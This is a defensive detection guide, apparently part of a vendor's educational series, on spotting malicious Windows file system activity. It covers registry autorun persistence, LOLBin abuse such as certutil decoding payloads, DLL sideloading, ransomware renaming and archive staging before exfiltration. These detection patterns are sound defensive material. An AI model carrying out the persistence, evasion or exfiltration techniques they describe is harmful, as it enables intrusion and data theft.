ASSURED

File system activity

Adversaries lean on living-off-the-land techniques: modifying legitimate files, creating hidden payloads, abusing trusted utilities. A seemingly benign file like C:\ProgramData\1.dat followed by registry modifications under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fits the persistence-staging pattern exactly. Tying that to a parent process and outbound connection completes the picture.

The four lifecycle events

01

Creation

New executables, DLLs, or configuration files in non-standard locations. %APPDATA%, %LOCALAPPDATA%, %PROGRAMDATA%, %TEMP%. PowerShell creating DLLs in user directories. regsvr32.exe writing unexpected files.

02

Modification

Unexpected changes to system binaries, DLLs, or configuration files. Monitor C:\Windows\System32 for tampering. Watch trusted application directories for sideloading.

03

Deletion

Sudden removal of logs, binaries, or staging files often signals cleanup. Watch for log clearing tied to other suspicious activity.

04

Access patterns

Large-scale sequential reads of sensitive datasets (customer databases, financial records, intellectual property) point to data staging.

Suspicious patterns by category

πŸ” Persistence mechanisms

  • Registry autorun keys under HKLM\Software\Microsoft\Windows\CurrentVersion\Run or the user-hive equivalent
  • Scheduled tasks with obfuscated commands or unusual triggers
  • DLL search order hijacking A technique that places a malicious DLL in an application directory so a legitimate binary loads it instead of the intended library. via malicious DLLs in application directories

πŸ’£ Payload deployment

  • Executables in sensitive system directories (C:\Windows\Tasks, C:\Windows\System32)
  • Files with double extensions (invoice.pdf.exe)
  • DLLs created in temporary or user folders

πŸ”’ Ransomware activity

  • Bulk renaming of files with extensions like .locked or .encrypted
  • Rapid creation of ransom notes across many directories

πŸ“¦ Exfiltration staging

  • Large compressed archives (.zip, .rar, .7z) containing sensitive data appearing shortly before outbound transfers

File metadata that matters

Parsing The process of analyzing data structures or code to extract meaningful information. has to do more than catch file events. The Metadata Data about data: file timestamps, owner, size, hash; an email's headers; a process's parent, command line, and signing certificate. In triage, metadata is often more diagnostic than the content itself. on each file is where the signal often lives.

File hashesMD5, SHA-1, SHA-256 for integrity verification and threat-intelligence correlation.
Digital signaturesExpired, self-signed, or mismatched certificates. The supply-chain risk lives here.
Entropy scoresValues above 7.8 typically indicate encryption, packing, or obfuscation.
TimestampsTimestomping, creation outside business hours, irregular modification patterns.
Permissions and ownershipSYSTEM-level privileges in user directories, unexpected ownership changes.
File size anomaliesDeviations from the version-pinned hash of your gold image are the reliable signal. Specific byte counts vary with build and patch level.

Fileless and LOLBin patterns

The hardest patterns to catch leave little or nothing on disk:

Memory-only execution

PowerShell loading code via System.Reflection.Assembly.Load() directly from memory.

WMI persistence

Scripts stored in the WMI repository or registry, executing via event subscriptions.

COM hijacking

Modifying HKCR to hijack legitimate COM objects.

LOLBins

certutil.exe decoding Base64 payloads. mshta.exe, wmic.exe, rundll32.exe for stealth execution.

File system activity frequently precedes exfiltration. Compressed archives created in %TEMP% shortly before outbound connections to low-reputation domains is a near-canonical pattern.

Next up

Schema normalization

Unified shape for heterogeneous alerts. OCSF, STIX, OpenC2. Governance and sustainability.

Read schema normalization